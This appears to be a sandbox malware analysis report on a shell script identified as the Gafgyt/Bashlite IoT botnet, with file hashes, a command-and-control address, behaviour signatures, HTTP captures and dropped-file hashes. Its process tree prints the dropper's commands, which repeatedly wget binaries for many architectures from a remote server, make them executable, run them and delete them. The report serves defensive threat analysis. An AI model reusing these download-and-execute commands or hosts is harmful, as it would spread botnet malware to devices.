Analysis

  • max time kernel
    15s
  • max time network
    40s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    25-12-2024 15:52

General

  • Target

    gtop.sh

  • Size

    2KB

  • MD5

    297b82d777e2257fda8221703403b2d3

  • SHA1

    d1ebd4f576bf89adcdf9453879c3ae2adeeb42ed

  • SHA256

    7080f56e8be79f89d154730ffb07e9d9f22bb754c6ee295548593245bc21a1af

  • SHA512

    dc0fc05650eca6bde3d5b02568e68810c61e1b6b58f5bb31f4847ef4082cd63f7aae45db042ec4e7f659615e761dcd472c6b8e20abd6e8431a3bd0c0f2ecea81

Malware Config

Extracted

Family

gafgyt

C2

154.213.186.115:4444

Signatures

  • Detected Gafgyt variant 9 IoCs
  • Gafgyt family
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 9 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 9 IoCs
  • System Network Configuration Discovery 1 TTPs 9 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/gtop.sh
    /tmp/gtop.sh
    1⤵
      PID:666
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmymips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:671
      • /bin/chmod
        chmod +x jackmymips
        2⤵
        • File and Directory Permissions Modification
        PID:692
      • /tmp/jackmymips
        ./jackmymips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:694
      • /bin/rm
        rm -rf jackmymips
        2⤵
        • System Network Configuration Discovery
        PID:698
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmymips64
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:699
      • /bin/chmod
        chmod +x jackmymips64
        2⤵
        • File and Directory Permissions Modification
        PID:701
      • /tmp/jackmymips64
        ./jackmymips64
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:703
      • /bin/rm
        rm -rf jackmymips64
        2⤵
        • System Network Configuration Discovery
        PID:705
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmymipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:706
      • /bin/chmod
        chmod +x jackmymipsel
        2⤵
        • File and Directory Permissions Modification
        PID:707
      • /tmp/jackmymipsel
        ./jackmymipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:708
      • /bin/rm
        rm -rf jackmymipsel
        2⤵
        • System Network Configuration Discovery
        PID:710
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmysh4
        2⤵
        • Writes file to tmp directory
        PID:711
      • /bin/chmod
        chmod +x jackmysh4
        2⤵
        • File and Directory Permissions Modification
        PID:712
      • /tmp/jackmysh4
        ./jackmysh4
        2⤵
        • Executes dropped EXE
        PID:713
      • /bin/rm
        rm -rf jackmysh4
        2⤵
          PID:715
        • /usr/bin/wget
          wget http://141.95.84.4:1594/jackmyx86
          2⤵
          • Writes file to tmp directory
          PID:716
        • /bin/chmod
          chmod +x jackmyx86
          2⤵
          • File and Directory Permissions Modification
          PID:717
        • /tmp/jackmyx86
          ./jackmyx86
          2⤵
          • Executes dropped EXE
          PID:718
        • /bin/rm
          rm -rf jackmyx86
          2⤵
            PID:720
          • /usr/bin/wget
            wget http://141.95.84.4:1594/jackmyi486
            2⤵
            • Writes file to tmp directory
            PID:721
          • /bin/chmod
            chmod +x jackmyi486
            2⤵
            • File and Directory Permissions Modification
            PID:724
          • /tmp/jackmyi486
            ./jackmyi486
            2⤵
            • Executes dropped EXE
            PID:725
          • /bin/rm
            rm -rf jackmyi486
            2⤵
              PID:728
            • /usr/bin/wget
              wget http://141.95.84.4:1594/jackmyi586
              2⤵
              • Writes file to tmp directory
              PID:729
            • /bin/chmod
              chmod +x jackmyi586
              2⤵
              • File and Directory Permissions Modification
              PID:733
            • /tmp/jackmyi586
              ./jackmyi586
              2⤵
              • Executes dropped EXE
              PID:734
            • /bin/rm
              rm -rf jackmyi586
              2⤵
                PID:736
              • /usr/bin/wget
                wget http://141.95.84.4:1594/jackmyi686
                2⤵
                • Writes file to tmp directory
                PID:738
              • /bin/chmod
                chmod +x jackmyi686
                2⤵
                • File and Directory Permissions Modification
                PID:742
              • /tmp/jackmyi686
                ./jackmyi686
                2⤵
                • Executes dropped EXE
                PID:743
              • /bin/rm
                rm -rf jackmyi686
                2⤵
                  PID:745
                • /usr/bin/wget
                  wget http://141.95.84.4:1594/jackmypowerpc
                  2⤵
                  • Writes file to tmp directory
                  PID:747
                • /bin/chmod
                  chmod +x jackmypowerpc
                  2⤵
                  • File and Directory Permissions Modification
                  PID:757
                • /tmp/jackmypowerpc
                  ./jackmypowerpc
                  2⤵
                  • Executes dropped EXE
                  PID:759
                • /bin/rm
                  rm -rf jackmypowerpc
                  2⤵
                    PID:761
                  • /usr/bin/wget
                    wget http://141.95.84.4:1594/jackmym86k
                    2⤵
                      PID:763

                  Network

                  • flag-de
                    GET
                    http://141.95.84.4:1594/jackmymips
                    Remote address:
                    141.95.84.4:1594
                    Request
                    GET /jackmymips HTTP/1.1
                    User-Agent: Wget/1.18 (linux-gnueabihf)
                    Accept: */*
                    Accept-Encoding: identity
                    Host: 141.95.84.4:1594
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Wed, 25 Dec 2024 15:52:11 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 23 Dec 2024 13:44:40 GMT
                    ETag: "31cc4-629f032c5bcb8"
                    Accept-Ranges: bytes
                    Content-Length: 203972
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                  • flag-de
                    GET
                    http://141.95.84.4:1594/jackmymips64
                    Remote address:
                    141.95.84.4:1594
                    Request
                    GET /jackmymips64 HTTP/1.1
                    User-Agent: Wget/1.18 (linux-gnueabihf)
                    Accept: */*
                    Accept-Encoding: identity
                    Host: 141.95.84.4:1594
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Wed, 25 Dec 2024 15:52:13 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 23 Dec 2024 13:44:40 GMT
                    ETag: "3d2c2-629f032c5dbf8"
                    Accept-Ranges: bytes
                    Content-Length: 250562
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                  • flag-de
                    GET
                    http://141.95.84.4:1594/jackmymipsel
                    Remote address:
                    141.95.84.4:1594
                    Request
                    GET /jackmymipsel HTTP/1.1
                    User-Agent: Wget/1.18 (linux-gnueabihf)
                    Accept: */*
                    Accept-Encoding: identity
                    Host: 141.95.84.4:1594
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Wed, 25 Dec 2024 15:52:15 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 23 Dec 2024 13:44:40 GMT
                    ETag: "31cc4-629f032c5f750"
                    Accept-Ranges: bytes
                    Content-Length: 203972
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                  • flag-de
                    GET
                    http://141.95.84.4:1594/jackmysh4
                    Remote address:
                    141.95.84.4:1594
                    Request
                    GET /jackmysh4 HTTP/1.1
                    User-Agent: Wget/1.18 (linux-gnueabihf)
                    Accept: */*
                    Accept-Encoding: identity
                    Host: 141.95.84.4:1594
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Wed, 25 Dec 2024 15:52:16 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 23 Dec 2024 13:44:40 GMT
                    ETag: "24aae-629f032c61690"
                    Accept-Ranges: bytes
                    Content-Length: 150190
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                  • flag-de
                    GET
                    http://141.95.84.4:1594/jackmyx86
                    Remote address:
                    141.95.84.4:1594
                    Request
                    GET /jackmyx86 HTTP/1.1
                    User-Agent: Wget/1.18 (linux-gnueabihf)
                    Accept: */*
                    Accept-Encoding: identity
                    Host: 141.95.84.4:1594
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Wed, 25 Dec 2024 15:52:17 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
                    ETag: "2708f-629f032c631e9"
                    Accept-Ranges: bytes
                    Content-Length: 159887
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                  • flag-de
                    GET
                    http://141.95.84.4:1594/jackmyi486
                    Remote address:
                    141.95.84.4:1594
                    Request
                    GET /jackmyi486 HTTP/1.1
                    User-Agent: Wget/1.18 (linux-gnueabihf)
                    Accept: */*
                    Accept-Encoding: identity
                    Host: 141.95.84.4:1594
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Wed, 25 Dec 2024 15:52:19 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
                    ETag: "1f934-629f032c64d41"
                    Accept-Ranges: bytes
                    Content-Length: 129332
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                  • flag-de
                    GET
                    http://141.95.84.4:1594/jackmyi586
                    Remote address:
                    141.95.84.4:1594
                    Request
                    GET /jackmyi586 HTTP/1.1
                    User-Agent: Wget/1.18 (linux-gnueabihf)
                    Accept: */*
                    Accept-Encoding: identity
                    Host: 141.95.84.4:1594
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Wed, 25 Dec 2024 15:52:20 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
                    ETag: "21da6-629f032c66c81"
                    Accept-Ranges: bytes
                    Content-Length: 138662
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                  • flag-de
                    GET
                    http://141.95.84.4:1594/jackmyi686
                    Remote address:
                    141.95.84.4:1594
                    Request
                    GET /jackmyi686 HTTP/1.1
                    User-Agent: Wget/1.18 (linux-gnueabihf)
                    Accept: */*
                    Accept-Encoding: identity
                    Host: 141.95.84.4:1594
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Wed, 25 Dec 2024 15:52:21 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
                    ETag: "22d07-629f032c68bc1"
                    Accept-Ranges: bytes
                    Content-Length: 142599
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                  • flag-de
                    GET
                    http://141.95.84.4:1594/jackmypowerpc
                    Remote address:
                    141.95.84.4:1594
                    Request
                    GET /jackmypowerpc HTTP/1.1
                    User-Agent: Wget/1.18 (linux-gnueabihf)
                    Accept: */*
                    Accept-Encoding: identity
                    Host: 141.95.84.4:1594
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Wed, 25 Dec 2024 15:52:23 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 23 Dec 2024 13:44:41 GMT
                    ETag: "25a15-629f032c6ab01"
                    Accept-Ranges: bytes
                    Content-Length: 154133
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                  • 141.95.84.4:1594
                    http://141.95.84.4:1594/jackmymips
                    http
                    4.7kB
                    213.0kB
                    86
                    142

                    HTTP Request

                    GET http://141.95.84.4:1594/jackmymips

                    HTTP Response

                    200
                  • 141.95.84.4:1594
                    http://141.95.84.4:1594/jackmymips64
                    http
                    4.3kB
                    260.2kB
                    79
                    180

                    HTTP Request

                    GET http://141.95.84.4:1594/jackmymips64

                    HTTP Response

                    200
                  • 141.95.84.4:1594
                    http://141.95.84.4:1594/jackmymipsel
                    http
                    3.2kB
                    211.7kB
                    58
                    144

                    HTTP Request

                    GET http://141.95.84.4:1594/jackmymipsel

                    HTTP Response

                    200
                  • 141.95.84.4:1594
                    http://141.95.84.4:1594/jackmysh4
                    http
                    3.1kB
                    155.9kB
                    56
                    104

                    HTTP Request

                    GET http://141.95.84.4:1594/jackmysh4

                    HTTP Response

                    200
                  • 141.95.84.4:1594
                    http://141.95.84.4:1594/jackmyx86
                    http
                    2.7kB
                    166.5kB
                    48
                    121

                    HTTP Request

                    GET http://141.95.84.4:1594/jackmyx86

                    HTTP Response

                    200
                  • 141.95.84.4:1594
                    http://141.95.84.4:1594/jackmyi486
                    http
                    2.6kB
                    134.6kB
                    47
                    96

                    HTTP Request

                    GET http://141.95.84.4:1594/jackmyi486

                    HTTP Response

                    200
                  • 141.95.84.4:1594
                    http://141.95.84.4:1594/jackmyi586
                    http
                    3.2kB
                    144.2kB
                    58
                    101

                    HTTP Request

                    GET http://141.95.84.4:1594/jackmyi586

                    HTTP Response

                    200
                  • 141.95.84.4:1594
                    http://141.95.84.4:1594/jackmyi686
                    http
                    3.5kB
                    149.9kB
                    64
                    110

                    HTTP Request

                    GET http://141.95.84.4:1594/jackmyi686

                    HTTP Response

                    200
                  • 141.95.84.4:1594
                    http://141.95.84.4:1594/jackmypowerpc
                    http
                    2.9kB
                    160.3kB
                    52
                    113

                    HTTP Request

                    GET http://141.95.84.4:1594/jackmypowerpc

                    HTTP Response

                    200
                  No results found

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/jackmyi486

                    Filesize

                    126KB

                    MD5

                    37bc4b1d4fce9500ee4fee154e61d9e6

                    SHA1

                    6fddc8858547e60672cca66857ceb7293638a057

                    SHA256

                    72071458112606424f8eb5e064a29f4ab4016d3971da7f89e62785abeb9cbb9c

                    SHA512

                    3db6d2ed8a079792d9fc024a9e98a7cf6959ca446c4944726707c48a93775c5b40b2b9d46150a287561a4fdc6a1aa21310d8271ac521b40a733d15f07623d8eb

                  • /tmp/jackmyi586

                    Filesize

                    135KB

                    MD5

                    4ca387e1408f29f6ed1979acfb671f82

                    SHA1

                    3467879b5fd631a5884f947ba013d61ea8a33c91

                    SHA256

                    1f7ba28d9d2ea091a89b2f7e4131b76163a6dcfb696cc34b073de8c9bf8afc4d

                    SHA512

                    18995f38839a98d0d478dad4b4b000e478effd1acaea865a5e947454e1d17d296ae519556f1a30f875b505f38f298440d20ff988440457907d5dd3ae9492c738

                  • /tmp/jackmyi686

                    Filesize

                    139KB

                    MD5

                    1aeb2935aec67978bfdab8243470b577

                    SHA1

                    b26b260d86609e9c758279c59eb8caec53fd0f69

                    SHA256

                    936937cb11ad426210af65f850f4afee5713e324ad703a12d0b5f687ea84cf57

                    SHA512

                    3843063e037212bc1a60b67a69407cb466ee67d6d9935018f7fcebe5536c4be078cc797865cdfafd2f9073cec8c6425546089aee641d3788b61f4238a15748ce

                  • /tmp/jackmymips

                    Filesize

                    199KB

                    MD5

                    f2ab2725ea6c883a5c608bc365c41fe5

                    SHA1

                    454d6983d9a7bb59aa0441b2c2cc805a97738e66

                    SHA256

                    531e818ee346f15e78c4f08d8de52a64597e10ce744b1be9dd2137eb1cd78c1d

                    SHA512

                    572183decc9a9ee8878e77485db9a22b6b0606e667743788eb5f5b1f8f35522505c216fe027931fa8913989053fa346b46b78c6b2209ecd53630bbc14e1d3a26

                  • /tmp/jackmymips64

                    Filesize

                    244KB

                    MD5

                    89655c0a64c3552ee71dc901a3561ad1

                    SHA1

                    8a488927882c18b5a35da06c6428f8707d4314ad

                    SHA256

                    08d4aed11bff7d311aa206396b2651f2e587e0fbe41d2688281ad4e0f6322d04

                    SHA512

                    23c581fe1ca57cc3dc9a7efeeee4d97eb5f97ac92ed3cf1f4af4e8d2caa467aa6e826a29f01a67b9dcc8609e77e76e9d23ee985f770fada89a9acab484c9af6f

                  • /tmp/jackmymipsel

                    Filesize

                    199KB

                    MD5

                    caabd697c443462f0a04d6b30529df58

                    SHA1

                    4fcb97074d1971ebfa482aad5edf208b43b6d819

                    SHA256

                    5259f289b8841e6beb9718c486210857edac40b5c206e5949fa5402b861849cf

                    SHA512

                    abf9607d8d332eca40f19ffef0866414fa353f12663c3dd232dd190954ab4f401f69cc9e84f669910c801a30df62bba8f00425aac5b1bfd99e756bdd4277a1a8

                  • /tmp/jackmypowerpc

                    Filesize

                    150KB

                    MD5

                    29f174a35d868d69945c412c159184dd

                    SHA1

                    7ac1d35bdbe15fed8443341de0875579ec8099d0

                    SHA256

                    b9966986b49c8db77d7909f17e743e4e7f6df00379a990467d62db55c69a3b7b

                    SHA512

                    6047582863aca61d2e8925f2fa6e4cc4eecdcd4095b76ea276e9489f7da1fc54503a01370f4f2f4553d144818cfa6b8324fdf772d92ecdcca57465904f012899

                  • /tmp/jackmysh4

                    Filesize

                    146KB

                    MD5

                    2a8e0da501cea8f8d32893a5fd6c9aab

                    SHA1

                    29b2be373b4155632926b9656861bebd53264473

                    SHA256

                    17f492bbf1085e3cec77c8b46831a7d2ef4662d0162377358e17296bebbb08d1

                    SHA512

                    64764a34cd7e8b7be0220519910b6f5a7e3c47340e45450e4e368515dca6c73ab3bbe11726f380533e11bc4ec840838d73a5dcc4720c93c96bb2b1444eedf6c7

                  • /tmp/jackmyx86

                    Filesize

                    156KB

                    MD5

                    afcb3a143b9f4e3a985c3eeb2e2ae4c8

                    SHA1

                    295f0e0380f71feb1c8911e29882db6a792bbd58

                    SHA256

                    fd0b10b636f99ee5e527b266d917c41d33230ad6bf600454e10b3e106db1031c

                    SHA512

                    b6124a40e8a5e7ff49df9b11e3b5097ac9e81b76c6146d902600f50de431e535136d22d63a34736b3fc53121ad0fa2d6b00af18b1ce834997c94c8eb288f5b08

                  We care about your privacy.

                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.